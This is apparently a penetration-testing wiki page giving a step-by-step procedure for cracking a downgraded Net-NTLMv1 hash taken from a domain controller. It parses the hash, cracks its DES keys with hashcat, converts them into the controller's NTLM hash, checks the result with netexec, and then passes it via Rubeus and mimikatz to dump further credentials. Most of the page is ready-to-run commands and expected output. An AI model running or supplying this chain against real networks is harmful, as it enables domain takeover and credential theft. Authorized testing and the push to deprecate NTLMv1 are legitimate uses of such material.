# ntlmv1-multi > [!IMPORTANT] > In January, Google/Mandiant released [this fantastic article](https://cloud.google.com/blog/topics/threat-intelligence/net-ntlmv1-deprecation-rainbow-tables) containing a [public release of Net-NTLMv1 Rainbow Tables](https://research.google/resources/datasets/?dataset_types=other&search=Net-NTLMv1&) to *"underscore the urgency of migrating away from this outdated protocol"* and, to us hackers, make our crack jobs faster! As discussed in [7MS #591](https://7minsec.com/blog/2023/09/29/7ms-591-tales-of-pentest-pwnage-part-52/) (oh and there's also a wonderful guide at [crack.sh](https://crack.sh/netntlm/), this [tool](https://github.com/evilmog/ntlmv1-multi) is awesome for taking downgraded hashes you can coercer from domain controllers (if the LANMAN settings are set right (well...wrong)) and then eventually crack the NTLM hash to use for passing/impersonating. Starting at the point where you've captured a downgraded hash: # Use ntlmv1-multi to parse the hash ``` sudo python3 /opt/ntlmv1-multi/ntlmv1.py --ntlmv1 THE-HASH-YOU-GOT-FROM-RESPONDER ``` # Prep hash for cracking As a first step, get the hash ready (we recommend doing the cracking somewhere with some horsepower, like [vast.ai](https://vast.ai): ``` echo "14B8DF571CF877A8:1122334455667788">>14000.hash echo "7CEAB088CDD16386:1122334455667788">>14000.hash ``` # Crack the hash! ``` ./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1 ``` :::tip *On a [vast.ai](https://vast.ai) instance, the `DES_full.charset` might be actually be in `/hashcat/charsets/DES_full.hcchr`* ::: The results will look something like this: ``` 14B8DF571CF877A8:1122334455667788:$HEX[STRING1] 7CEAB088CDD16386:1122334455667788:$HEX[STRING2] ``` # Covert DES keys to NTLM keys In the previous step, the `STRING1` and `STRING2` values are DES keys and not NTLM keys, so we need to convert them using `deskey_to_ntlm.pl` which comes with [hashcat-utils](https://github.com/hashcat/hashcat-utils). ``` deskey_to_ntlm.pl STRING1 deskey_to_ntlm.pl STRING2 ``` Lets call the output of these operations `STRING1NTLM` and `STRING2NTLM` going forward. :::tip *On a [vast.ai](https://vast.ai) instance, the `deskey_to_ntlm.pl` might be in `/hashcat-utils/src/deskey_to_ntlm`* ::: # Calculate the last 4 characters of the hash: ``` ./ct3_to_ntlm.bin 8819D23E095B0097 1122334455667788 LAST4 ``` In the example above, the `LAST4` represents the output of `./ct3_to_ntlm.bin 8819D23E095B0097 1122334455667788` :::tip *On a [vast.ai](https://vast.ai) instance, the `ct3_to_ntlm.bin` might be located in `~/hashcat-utils/src`* ::: # Putting it altogether Now that you have `STRING1NTLM` and `STRING2NTLM` and `LAST4`, put them altogether to make the NTLM hash of the domain controller! ``` STRING1NTLMSTRING2NTLMLAST4 ``` ## Sanity check Once you have all the pieces assembled you can sanity check your work with netexec: ``` nxc smb domain.com -u DC01$ -H 'NTLM-HASH-YOU-ASSEMBLED' ``` # Next steps Now you can use [Rubeus](/pentesting/Internal/rubeus) to do an `asktgt` using the RC4 value (`STRING1NTLMSTRING2NTLMLAST4`) and then pass it with Rubeus and `/ptt`, and then use [mimikatz](/pentesting/Internal/mimikatz) to extract important hashes!